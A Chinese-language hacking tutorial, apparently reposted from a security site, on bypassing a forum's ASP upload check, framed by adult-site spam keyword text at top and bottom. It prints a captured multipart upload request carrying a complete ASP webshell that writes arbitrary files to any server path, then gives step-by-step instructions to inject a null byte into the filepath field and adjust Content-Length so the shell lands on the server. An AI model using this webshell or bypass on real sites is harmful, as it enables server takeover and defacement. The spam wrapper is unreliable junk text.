成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

解析上傳漏洞欺騙技術

安全 黑客攻防
先我們要獲得客戶端和服務器之間傳遞的數據,事先準備好一個ASP木馬準備上傳,當然不可能成功,我們要的就是這中間我們向服務器提交的數據。一般用WsockExpert來獲得數據,由于數據太多只能把關鍵部分發出來

實際上網絡中存在著很多的漏洞,通過這些漏洞的利用黑客就可能會入侵網站的服務器,取得管理員權限。其中不少的程序都存在著上傳漏洞,通過上傳漏洞黑客入侵者便可以上傳一個ASP木馬,然后通過上傳漏洞欺騙技術來達到自己入侵的目的。接下來本篇文章就講分析一下上傳漏洞欺騙的具體原理。

POST /bbs/upfile.asp HTTP/1.1

……. 省略了N多沒用信息

 

  1. Content-Length: 1792  
  2. Connection: Keep-Alive  
  3. Cache-Control: no-cache  
  4. Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN 
  5. -----------------------------7d52191850242  
  6. Content-Disposition: form-data; name="filepath" 
  7.  
  8. uploadFace  
  9. -----------------------------7d52191850242  
  10. Content-Disposition: form-data; name="act" 
  11.  
  12. upload  
  13. -----------------------------7d52191850242  
  14. Content-Disposition: form-data; name="file1"
  15. filename="E:\木馬\asp\shell.asp" 
  16. Content-Type: text/plain  
  17.  
  18. <% dim objFSO %>  
  19. <% dim fdata %>  
  20. <% dim objCountFile %>  
  21. <% on error resume next %>  
  22. <% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>  
  23. <% if Trim(request("syfdpath"))<>"" then %>  
  24. <% fdata = request("cyfddata") %>  
  25. <% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>  
  26. <% objCountFile.Write fdata %>  
  27. <% if err =0 then %>  
  28. <% response.write "<font color=red><h2>成功!</h2><font>" %>  
  29. <% else %>  
  30. <% response.write "<font color=red><h1>失敗!</h1></font>" %>  
  31. <% end if %>  
  32. <% err.clear %>  
  33. <% end if %>  
  34. <% objCountFile.Close %>  
  35. <% Set objCountFile=Nothing %>  
  36. <% Set objFSO = Nothing %>  
  37. <% Response.write "<form action='' method=post>" %>  
  38. <% Response.write "保存留言<font color=red>如D:\web\x.asp</font>" %>  
  39. <% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>  
  40. <% Response.Write "<br>" %>  
  41. <% Response.write "地址來自" %>  
  42. <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>  
  43. <% Response.write "<br>" %>  
  44. <% Response.write "你的留言:" %>  
  45. <% Response.write "<textarea name=cyfddata
  46. cols=80 rows=10 width=32></textarea>" %>  
  47. <% Response.write "<input type=submit value=sky!!>" %>  
  48. <% Response.write "</form>" %> 

-----------------------------7d52191850242

Content-Disposition: form-data; name="fname"

E:\木馬\asp\shell.asp

-----------------------------7d52191850242

Content-Disposition: form-data; name="Submit"

上傳
-----------------------------7d52191850242--

傳遞的信息我們獲取了,下面就來修改下達到上傳漏洞欺騙目的。主要修改一下幾點:

1.Content-Disposition: form-data; name="file1"; filename="E:\木馬\asp\shell.asp"

2.Content-Disposition: form-data; name="fname"

E:\木馬\asp\shell.asp

3.最重要的地方是Content-Disposition: form-data; name="filepath"下面的值要修改下。我們修改成uploadFace\shell.asp后面怎么加一個空字符呢?用UltraEdit是個好方法,用16進制編輯,(因為'\0'這個字符也占一個位置,所以我們先打入一空格,然后再在UltraEdit(用Ctrl+H轉換到16進制模式下)里將就空格符的20改成00)。

4.還有一個地方也要修改,就是這句Content-Length: 1792表示提交數據的字符個數。

如果你修改了filepath的值那么這個長度1792也要變換,一個字母或者數字的長度就是1,不要忘記最后面那個空格那個也算1。

【編輯推薦】

  1. 親身體驗MS07-029漏洞入侵
  2. 解析系統泄露密碼入侵攻擊
  3. 經典后門實例之線程插入后門
  4. 經典后門實例之擴展后門
  5. 通過數據庫下載漏洞發起網絡攻擊

 

責任編輯:張啟峰 來源: 安全在線
相關推薦

2010-09-13 16:24:39

2013-04-01 10:12:39

2011-04-18 13:33:07

2011-07-13 13:43:30

2015-12-01 10:43:55

2009-12-17 10:14:14

2019-10-31 08:43:43

ICMPARP協議ARP欺騙

2013-09-04 10:41:08

2012-04-12 16:05:50

2009-07-15 20:44:17

2009-12-28 12:16:54

2011-04-06 10:23:46

2010-09-16 16:06:37

2013-06-25 10:11:18

2010-12-05 19:36:32

2013-11-29 15:41:08

解析漏洞ApacheApache解析漏洞

2010-08-03 11:08:57

2020-11-08 16:00:33

人臉識別技術安全

2018-12-18 09:20:44

欺騙技術物聯網安全物聯網

2019-11-20 15:18:15

欺騙技術網絡安全基礎設施安全
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 色视频在线免费观看 | 一级做a爰片久久毛片免费看 | 亚洲丝袜天堂 | 国产成人精品一区二区三区在线 | 欧美最猛黑人 | 伊人久久精品一区二区三区 | 欧美日韩在线免费观看 | 精品99在线| 99久久婷婷国产综合精品 | 欧美成人第一页 | 欧美三级视频在线观看 | 亚洲综合在线一区二区 | 一级毛片播放 | 精品一区二区久久久久久久网精 | 亚洲欧美一区二区三区在线 | 亚洲精品一区二区三区在线 | 亚洲成人蜜桃 | 久久久久国产 | 99精品国产一区二区三区 | 毛片黄片免费看 | 久久国产区 | 91精品在线播放 | 1000部精品久久久久久久久 | 久久黄色| 色眯眯视频在线观看 | 在线一级片 | 成人不卡 | 成人毛片视频免费 | 成人欧美一区二区三区黑人孕妇 | 另类视频区 | 国产日韩精品在线 | 欧美一区二区三区的 | 日本久草视频 | 精品国产乱码久久久久久牛牛 | 久久久综合精品 | 日本成人福利 | 亚洲成人一区 | 久久久www成人免费无遮挡大片 | 亚洲精品一| 中文字幕一区二区三区四区五区 | 日韩精品免费播放 |